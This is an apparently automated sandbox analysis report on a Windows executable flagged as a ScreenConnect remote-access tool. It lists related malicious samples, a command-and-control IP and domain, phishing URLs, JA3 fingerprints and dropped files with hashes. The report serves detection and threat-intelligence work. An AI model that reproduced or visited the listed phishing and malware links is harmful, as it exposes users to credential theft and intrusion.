                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: 96r3GgxntQ.exe

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                13:27:17API Interceptor373361x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                                13:27:17API Interceptor1x Sleep call for process: 96r3GgxntQ.exe modified
                                                                                                                                                                                                                13:27:19API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                13:27:36API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                79.110.49.185X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    secure.stansup.comX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    s-part-0017.t-0009.fb-t-msedge.netpirkimo u#U017esakymas #10104 OC 9970.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    CharcoalWharf.json.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    https://u47839971.ct.sendgrid.net/ls/click?upn=u001.SS8YqfWjf1b3UNFf2g8-2BbyepSJ9NnVqTjg5p4PlqyZLDG-2F-2FRHUWKB7tpHO-2BD9IAzfDK69NBor6n5GDDWuKOaXjILtpHrb-2FuqosweWIwJauCFjFOIVaIDje-2BTbWeqpid-2Fe0IpJIrTIznxRC8RuWTXkcZZXZKUxIgeeMWOFH96Tjh3a3uDeIXRyoiB6ZRGKZhHD63OuPdyktyTbMDbA-2FurGQ-3D-3DGlRK_1fgoI9z-2BmeHj6kFR5jmXJyN8Vyo9ja5rNrkl1rR8UXAlmAe6PSc2-2FD85CLOIF98tpCjfsSquWpaRYnYzjD-2B-2FDF-2F8BwiwRSEwmTXwwlDUaQI3bDBZTUv-2Ffbse4A61ed6hVc-2BhhTqdpCqzpir5GY49O-2BVdqG9mHEhTR8OvRsDhxES9QAdY7ZiH-2BurXMNUWGL6VuIIVYma05ZXZK6zhQMDhjNBnJShmRWPp7Ow2IJgH96F8uRyUdyMUZ9au5PfRhmvWMnTj3B1KVxYBpNo7XRlBSlYjK74Z4HptPWz0XAvVILLp4Z5Qq7I-2BYF76YXE5ZsE-2F9hOEdmxnqZwZIEaC1BNDg2XB-2BluEEvEXRuR9ohEPc6VObquUxTQmba8bObSY0wG3oOeb2xD8hV6IKwMnr9d-2B5HbQscEqkWH5k7qnk6bAGBIHHNt95VH4uagG-2Bh74PJCdwHqpitEnC4IeAHXNdNtMkKw34-2BF8TeV7q4SmkRwe9osbefOHPWGyls7sZdEjodVX7wlBDRV2BLQlTlDkK-2FzuZ2EsHCtWTv7yrVJT-2B6p3fl4O5qZGyWAuATjn7386SmbgYFZYAIaRjabXb6J3Z9IYhB-2BBiP3zxZSMd-2BGGNtSLCQw7FqwKOUhYoEZSgG-2FLraJhb7xOSF-2FZGKBw-2FWGPQ5W16K6ZnP31akPWN-2FRy3A1tFL9-2FQXaviWuNn8VOeqLfBR9isxQ-2BqB-2Fm-2BPFRMhM4zyM42FPD-2FRIJxCXHHfAnucSqTKeA1iykI89pw6joYB-2B9v-2FXzQpkgszpTxbxZcZ7mH0xUY6S3QZDaIWpt-2F-2B0FpvTn8cArsTTKjQo1QO476bdWvqqoz32vBNn214xuFkN0blGHeazkhMWwmEzZM6r-2BTFrW2-2Fha62dTAc7eNUguY6HOm3gtrj2-2FYlAidnBTp5Y8fj3jmA-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    Fax_Message_04 September, 202411_21_58 AM_564308269612697.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    https://t.ly/8LgfkGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    http://lowes.mooo.com/index.php?search=4&d16852&morde=354-1256&lm=400100KWWT29761&sd=15&page=9u6rpKHD2TMFWFa#izRRKlsmoFgLg4jmhaU9Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    https://8jkfw9cqp7ep.z13.web.core.windows.net/?zpbid=78432_55610c1d-9229-11ef-824f-03718b6de7bb#Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    _Play__New__VM__01min 04sec____ATT2006587654 (Randiwestbrook) .htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    EXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdLGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.253.45
                                                                                                                                                                                                                                    bg.microsoft.map.fastly.nethttps://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                    https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                    https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                    https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                    https://www.evernote.com/shard/s512/sh/13954171-1260-d858-de69-06ffb19cd62f/IpXIE2ZoTfkUL7pCMibo1Wvq-pGORrIcZV-gRtF0-ppZOJhbsY-7OG4AYQ__;!!A-_UObntj2w!TCF-dwwxew6_4xwX0vz37obzz_Nme89BLzz0LCDHIEcMt0H-fDdV9LeqXfzP36mva0iIJhqBnntAwfDFEkCvUyHvgSgA8Q$Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                    https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                    l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                    Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                    28unTKrjKS.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                    https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.232.214.172

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    OTAVANET-ASCZX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    gunzipped.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                    • 79.110.49.176
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    SecuriteInfo.com.Gen.Variant.Jaik.244817.4008.28987.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 79.110.49.185

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exexrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.8008396854887236
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5TX:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBf0
                                                                                                                                                                                                                                                        MD5:CC71B87189D068C9EAB29AD45475D44C
                                                                                                                                                                                                                                                        SHA1:4B7B581DB4DF01E2CB15424F258FD1D6591AAFDF
                                                                                                                                                                                                                                                        SHA-256:9C34D59F5DB6D2DAC7535CF438E2C8A330CE555EEB0E86D46AF613330B4120B8
                                                                                                                                                                                                                                                        SHA-512:CA40D7F99EA066FCBB217BE7EB83C5DA59515F1ADFC637F3CC1A693DE1E03B952D99AECD22FA266D055E26C0BEA188C36BEC1DE353CB6BFA3CF6DA0DD732651E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc7e8a32c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.7715870363348013
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:bSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:baza9vqcHbrq2UyUVWlW
                                                                                                                                                                                                                                                        MD5:B1054DBC77838D9091785C977DFE8B25
                                                                                                                                                                                                                                                        SHA1:03D84075103B1E56EFB94E080DD314B5610FDC37
                                                                                                                                                                                                                                                        SHA-256:874C5E128A3EAC241E6B8C2E2D544BE7DEB11FBB2F8D4B542C7CBD261F3AA944
                                                                                                                                                                                                                                                        SHA-512:F96E4F7FCC6E4114B84C2202291D7AA65509234DAC364067FA47ECE9652D84A9A5AF35824B05C84BE97D249FA76F8F1861137F79143B7EA90C78C46181A62436
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..,... ...............X\...;...{......................0.p.....#....{.......|..h.r.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......%9...{...............................................................................................................................................................................................2...{..........................................|..................]..s.....|...........................#......h.r.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                        Entropy (8bit):0.07973054067650195
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:QtyYeGSavr8qrrvr+gvrr/OZ0allVmctlll/Sm1l1:QtyzDgn/OKuLPPv
                                                                                                                                                                                                                                                        MD5:4742488B79192EAC6E632519A6DC137F
                                                                                                                                                                                                                                                        SHA1:32EF179413E67FBC7D882105783E715525B6D84F
                                                                                                                                                                                                                                                        SHA-256:C56262113589D52A9DB4E19E56DBF8E53ED6B1B57E7F8EBE5419F1078C6B6B69
                                                                                                                                                                                                                                                        SHA-512:F6689F80DE299062354FC287C63679586E4F9EA2388F68578FFD8DF0A594A66E87D7CEF8BC56320A2007A2CF1A5252BEA9954087BCB71BBE9EAF5D5624D7E603
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:82p,.....................................;...{.......|..#....{..........#....{..#....{...i..#....{.V................]..s.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_96r3GgxntQ.exe_183a24e280da4a38e54d6993e779d74f437fce42_1e18bb33_683ddce7-d285-483b-8fbd-7e2ea1f6255e\Report.wer

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                        Entropy (8bit):0.9117990972030452
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:adF5vM5U8d5AsohqnGXyf8QXIDcQvc6QcEVcw3cE/P+HbHg/Jg+OgBCXEYcI+1sg:ervMz5A0X0BU/Iji0ozuiFMZ24IO8Q
                                                                                                                                                                                                                                                        MD5:84C7FF937E45F620CBE2F4AB10418B96
                                                                                                                                                                                                                                                        SHA1:53B32660802F5CE23202582DEEBF4537E0872A04
                                                                                                                                                                                                                                                        SHA-256:B547C8548A822F543BBC7EF24105ECEAFDFAD79ED92E40A381588052FBFD5D93
                                                                                                                                                                                                                                                        SHA-512:1F25A9A3DB7AB65A989ADB9F7D40562B2B47CFDA36EA38FA5347BAD6BEA19C043AD06F99F250233D8AF266F04153B7291F6D89D15A25F8A6AFB5AB182C67A3F9
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.9.7.4.8.3.4.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.8.4.0.3.5.7.7.2.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.3.d.d.c.e.7.-.d.2.8.5.-.4.8.3.b.-.8.f.b.d.-.7.e.2.e.a.1.f.6.2.5.5.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.4.8.4.5.1.4.-.0.9.2.2.-.4.1.a.c.-.9.7.7.3.-.a.4.f.4.4.2.a.7.b.d.8.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.6.r.3.G.g.x.n.t.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.8.-.0.0.0.1.-.0.0.1.3.-.c.9.a.3.-.9.e.2.3.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.5.b.5.4.e.c.7.4.7.f.d.7.4.d.1.3.4.c.6.d.1.9.9.7.c.8.0.2.b.2.f.0.0.0.0.f.f.f.f.!.0.0.0.0.a.a.f.3.3.c.f.2.f.9.e.9.7.0.a.4.1.5.3.5.a.5.5.6.d.c.5.0.7.e.6.6.7.2.8.8.a.c.8.2.!.9.6.r.3.G.g.x.n.t.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA84.tmp.dmp

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80864
                                                                                                                                                                                                                                                        Entropy (8bit):1.6904526352803595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8kAWjJhI/Th8wJdWS/OSYTXdX8538U/rNb77PV1wIJXQY2F80:8yJhI/GEOlqZb7rJXQY
                                                                                                                                                                                                                                                        MD5:29E2FFA02BFA48B78523C0E65003DC78
                                                                                                                                                                                                                                                        SHA1:497F782B57D6A33E9A94AA65ACF1B557A4D31330
                                                                                                                                                                                                                                                        SHA-256:0E47893B853B8B8248A3E30A3D975C4F5CAE06DF0C1A9DFB42A4F94A2378DB6C
                                                                                                                                                                                                                                                        SHA-512:3BE3E334AD98DC7F4120A1C3A6D56490410DFAC204FBF7BBAAC4D01DF5E2186B023F2D0997930544A58017CAF16A21B3897875F64DAF6E2BD6DAC430DB2F46AE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MDMP..a..... ..........g.........................................;..........T.......8...........T............!..`........... ...........................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBD.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8330
                                                                                                                                                                                                                                                        Entropy (8bit):3.7021577000772097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJNa6p3T6YeVSU94Lgmf0tfprzx89bHpcsf4UNJm:R6lXJQ6p3T6YMSU94Lgmf0twHpvf4Sk
                                                                                                                                                                                                                                                        MD5:55C578AE764B1776890AB89C4336461C
                                                                                                                                                                                                                                                        SHA1:5933B7DD609809E8001967478D40564E9A4614B7
                                                                                                                                                                                                                                                        SHA-256:9E2295AD89B795378A5B2967AD68E88B18E5213B6E4D462042DF7E200AA58B71
                                                                                                                                                                                                                                                        SHA-512:4BBB8FA10CEF6AAB9356077D3213500377DBE70785F8E6E9F1049555A13B4E791332E423E516FE2F68CD92E089D049F4CEDCCF670993409B0D9547C4F3B62B18
                                                                                                                                                                                                                                                        Malicious:false
